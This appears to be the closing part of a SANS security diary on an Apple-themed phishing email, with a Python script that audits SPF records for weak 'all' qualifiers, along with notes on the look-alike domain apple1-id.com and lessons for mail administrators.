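A small SPF audit in Python, as an added example (not a tool from the diary): it parses a record into qualifier/mechanism pairs, flags a final +all, ~all or ?all, a missing all, mechanisms placed after all (which are never evaluated) and more than ten DNS-querying terms (the RFC 7208 limit), and rewrites the trailing qualifier to -all. The ssl.com record is the one quoted above; the other records are constructed for the demo.

```python
"""Audit the `all` qualifier of an SPF record (added example, not from the diary).

An SPF record (RFC 7208) is a list of mechanisms evaluated left to right; the
first match decides the result, and `all` matches everything, so the qualifier
in front of it is the verdict for every sender not listed before it:
    +all (or bare all) -> pass, ~all -> softfail, -all -> fail, ?all -> neutral.
A softfail tells receivers to accept the message and at most mark it, which is
why the diary recommends -all. SSL_COM_RECORD is copied from the diary; the
records in the demo below are constructed.
"""
import re

SSL_COM_RECORD = ("v=spf1 ip4:144.76.245.218 ip4:199.102.137.146 include:amazonses.com "
                  "include:mailanyone.net include:fusemail.net ~all")

QUALIFIER = {"": "pass", "+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
MECHANISM = re.compile(
    r"(?P<q>[+\-~?]?)(?P<mech>all|ip4|ip6|a|mx|ptr|exists|include)(?:[:/](?P<arg>.+))?$",
    re.IGNORECASE,
)
DNS_LOOKUP_TERMS = {"include", "a", "mx", "ptr", "exists", "redirect"}


def parse_spf(record):
    """Return [(result_if_matched, name, argument)] per term; modifiers get 'modifier'."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF version 1 record")
    parsed = []
    for term in terms[1:]:
        m = MECHANISM.match(term)
        if m:
            parsed.append((QUALIFIER[m["q"]], m["mech"].lower(), m["arg"]))
        elif "=" in term:                       # modifier, e.g. redirect=... or exp=...
            name, _, value = term.partition("=")
            parsed.append(("modifier", name.lower(), value))
        else:
            raise ValueError(f"unknown SPF term: {term}")
    return parsed


def audit_spf(record):
    """Findings a mail admin should fix; an empty list means nothing to flag."""
    parsed = parse_spf(record)
    findings = []
    mechs = [p for p in parsed if p[0] != "modifier"]
    for i, (result, mech, _) in enumerate(mechs):
        if mech != "all":
            continue
        if result == "pass":
            findings.append("'+all': anyone may send as this domain")
        elif result == "softfail":
            findings.append("'~all': unlisted senders softfail, receivers accept and at most mark the mail")
        elif result == "neutral":
            findings.append("'?all': no policy at all for unlisted senders")
        if i < len(mechs) - 1:
            findings.append("mechanisms after 'all' are never evaluated")
        break
    else:   # no `all` mechanism at all
        if not any(name == "redirect" for kind, name, _ in parsed if kind == "modifier"):
            findings.append("no 'all' mechanism: unlisted senders are treated as neutral")
    lookups = sum(1 for _, name, _ in parsed if name in DNS_LOOKUP_TERMS)
    if lookups > 10:
        findings.append(f"{lookups} DNS-querying terms: RFC 7208 allows 10, evaluation returns permerror")
    return findings


def harden(record):
    """Rewrite a trailing +all/~all/?all/all to -all; other records are returned unchanged."""
    return re.sub(r"\s[+~?]?all\s*$", " -all", record.rstrip())


if __name__ == "__main__":
    for rec in (SSL_COM_RECORD, harden(SSL_COM_RECORD), "v=spf1 +all", "v=spf1 ip4:192.0.2.1"):
        print(rec, "->", audit_spf(rec) or "OK")
```

Run it against the TXT record returned by dig TXT for the domain you are checking; keep in mind it only judges the record's shape, not whether the listed hosts are the right ones.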

Next, the link leads to apple1-id.com, a domain not associated with Apple. The web page is still up (but blacklisted) and is a good copy of the genuine Apple login page (screenshot not reproduced).

Interesting about this domain: it was registered back in January. So the bad guy put some lead time into this to avoid filters based on recently registered domains.

So lessons learned:

  • Make sure your SPF record ends with -all, not ~all (subtle but important)
  • When hunting for bad domains, details matter, and the registration date alone may not be enough to find malicious domains.

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute